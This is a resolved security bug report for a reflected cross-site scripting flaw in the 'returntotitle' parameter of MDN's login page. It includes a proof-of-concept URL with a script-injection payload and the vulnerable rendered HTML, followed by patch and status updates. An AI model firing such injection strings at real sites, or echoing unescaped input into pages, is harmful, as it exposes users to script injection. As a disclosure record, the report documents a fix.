XSS vuln in 'returntotitle' parameter on Special:UserLogin page

VERIFIED FIXED

Status

--
critical
VERIFIED FIXED
9 years ago
3 years ago

People

(Reporter: reed, Assigned: royk)

Tracking

({wsec-xss})

Details

(URL)

(Reporter)

Description

9 years ago
Found by hyperscan

https://developer.mozilla.org/index.php?title=Special:UserLogin&returntotitle="><script>alert('xss');</script>

	 		<div id="page-top"><div id="pageToc"><div class="pageToc"><h5>Table of contents</h5></div></div><div class="pageText" id="pageText"><div id="pageTypeSpecial"><form method="post" action="/Special:UserLogin" class="user-login"><fieldset><input type="hidden" value="1" name="auth_id" id="hidden-auth_id" autocomplete="off" /><div class="field"><label for="text-username">Username</label> <input type="text" value="" name="username" tabindex="1" size="24" spellcheck="false" class="input-text" id="text-username" autocomplete="off" /><div class="create-account"><a href="/Special:UserRegistration">Create an account</a></div></div><input type="hidden" value=""><script>alert('xss');</script>" name="returntotitle" id="hidden-returntotitle" autocomplete="off" /><div class="field"><label for="password-password">Password</label> <input type="password"  name="password" tabindex="2" size="24" spellcheck="false" class="input-password" id="password-password" autocomplete="off" /><div class="forgot-password"><a href="/Special:UserPassword">Forgot password?</a></div></div><button type="submit" name="deki_buttons[action][login]" value="login" tabindex="3" class="input-button"><span>Login</span></button></form></div></div></div><div class="printfooter" id="printfooter"><hr />

Specifically,

<input type="hidden" value=""><script>alert('xss');</script>" name="returntotitle" id="hidden-returntotitle" autocomplete="off" />
(Reporter)

Comment 2

9 years ago
Attachment 389574 [details] [diff] includes a fix for this bug.
(Reporter)

Comment 3

9 years ago
Patch resolved the issue.
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → FIXED
(Reporter)

Updated

9 years ago
Assignee: nobody → royk
(Reporter)

Updated

9 years ago
Blocks: 505301
Verified FIXED.
Status: RESOLVED → VERIFIED
Component: Deki Infrastructure → Other
Product: Mozilla Developer Network → Mozilla Developer Network
Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.
Keywords: wsec-xss
For bugs that are resolved, we remove the security flag. These haven't had their flag removed, so I'm removing it now.
Group: websites-security
You need to log in before you can comment on or make changes to this bug.